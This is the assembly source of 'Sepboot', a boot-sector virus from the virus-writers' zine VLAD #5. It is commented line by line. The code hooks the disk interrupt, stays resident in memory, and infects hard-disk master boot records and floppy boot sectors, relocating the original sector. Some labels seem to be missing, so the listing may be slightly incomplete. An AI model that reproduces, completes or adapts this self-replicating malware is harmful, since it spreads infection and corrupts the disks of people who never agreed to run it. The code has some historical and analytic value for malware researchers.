Virus Labs & Distribution
VLAD #5 - Sepboot
org 0
jmp 03e
org 03e
jmp 07c0:044 ;Align IP to 0
ishard db 00 ;0 if Floppy infection, other wise hard.
xor ax,ax
mov ds,ax ;DS=0
mov ax,[0413] ;Get amount of mem.
xor di,di
xor si,si ;SI and DI=0
dec ax ;Take one away from amount of mem
mov cl,06
mov [0413],ax ;give INT 12 return new amount
shl ax,cl ;get reserved segment for virus
mov es,ax ;ES=reserved segment
xchg ax,[04e] ;INT 13 seg=VIRSEG, AX=old INT 13 seg
mov origseg + 07c00,ax ;move old seg to storage location
mov ax,offset handler ;location of Virus INT 13 handler
xchg ax,[04c] ;INT 13 off=d7, ax=old INT 13 off
mov origoff + 07c00,ax ;move old off to storage location
push cs
pop ds ;DS=CS
mov cx,0200 ;Copy 200(512) bytes (from DS/CS to ES/VIRSEG)
movsb ;copying bytes
push es ;push VIRSEG
mov ax,offset entry
push ax ;push 77
retf ;Jump to VIRSEG:77
and ishard,1 ;test hard disk indicator
jnz nothard ;if hard, jump pass hard disk infector to HARD exit
push cs
pop ds ;DS=CS
mov ax,0201 ;read one sector
mov bx,0200 ;to ES:200
mov cx,1 ;sector 1, track 0
mov dx,080 ;side 0, drive 80 (first phsy HD)
call int13 ;INT 13
call checkinf ;CHECK IF INFECTED
jcxz fexit ;if ready infected jump pass infector to FLOPPY exit
mov ishard,1 ;INFECTION TYPE = HARD
call copyboot ;copy partion / boot info to virus
mov ax,0302 ;write 2 sectors
mov cx,1 ;Sector 1, track 0 (orig Part Tbl to sector 2)
xor bx,bx ;form ES:0
mov dx,080 ;side 0, drive 80
call int13 ;INT 13
fexit: ;FLOPPY exit
call getrootsect ;get sector of orgig. boot sect.
mov dl,0 ;drive A:
jmp >l0 ;jmp pass harddrv loader
nothard: ;HARDRV loader
mov cx,0002 ;orig boot sect. at sector 2
mov dx,080 ;drive C:
l0: ;exit body, pass to orig boot sect.
mov ax,0201 ;load one sector (ready chosen);
xor bx,bx
mov es,bx ;at SEGMENT 0
mov bh,07c ;OFFSET 7c00 (0:7c00)
call int13 ;int13
jmp 0:07c00 ;jmp to loaded sector.
db '-=>S�p�L�r�<=-' ;:-)
push ax
push bx
push cx
push dx
push ds
push es
push di
push si ;save regs
cmp ah,2 ;function => read
jb notwr ;else EXIT
cmp ah,5 ;and function =< verify
jnb notwr ;else EXIT
cmp dl,2 ;drive < 2
jnb notwr ;else EXIT
call infect ;all is good, call infector
notwr: ;EXIT
pop si ;restore regs
pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmp far [origoff] ;jump to orig int 13.
infect: ;INFECTOR
push cs
pop es
push es
pop ds ;DS=ES=CS
mov ax,0201 ;read 1 sector
mov dh,0 ;side 0
mov bx,0200 ;off set 200
mov cx,1 ;sector 1, track 0
call int13 ;int13
jc error ;if error jmp to ERROR
call checkinf ;check if infected
jcxz exitinf ;if infected jmp to EXIT
call copyboot ;copy boot and partn info to virus
call getrootsect ;get sector to write orig boot to
mov ishard,0 ;FLOPPY infection
mov bx,0200 ;from offset 200
mov ax,0301 ;write 1 sector
call int13 ;int 13
jc error ;if error jmp to ERROR
xor bx,bx ;from offset 0
mov cx,1 ;sector 1, track 1
mov dh,0 ;side 1
mov ax,0301 ;write 1 sector
call int13 ;int13
exitinf: ;EXIT
ret ;return from infector and to orig int 13
db 09a
origoff dw 0
origseg dw 0
ret ;return
mov di,end
mov si,0200 + end ;18c of orig sect
mov cx,0200 - end
movsb ;copy partition info
mov di,2
mov si,0202 ;2 of orig sect
mov cx,03c
movsb ;copy boot info
ret ;return
cmp byte ptr [015],0f9 ;if drive is 1.2m HD
jnz gr1 ;if not try next type
mov cx,000e ;track 0, sect 14
mov dh,1 ;side 1
ret ;return
cmp byte ptr [015],0f0 ;if drive is 1.44m HD
jnz gr2 ;if not try next type
mov cx,000f ;track 0, side 15
mov dh,1 ;side 1
ret ;return
gr2: ;if type not decided, just infect it as 360k floppy
mov dh,1 ;side 1
mov cx, 3 ;sector 3, track 0
ret ;return
xor ax,ax ;reset drive
call int13 ;int13
ret ;exit from infector to orig int 13
mov cx,5 ;cmpare 5 bytes
mov si,048 ;at 48
mov di,0248 ;and 248 (48 of orig boot)
repz ;while still equal
cmpsb ;cmpare
ret ;return (if the string was equal CX will now be 0)
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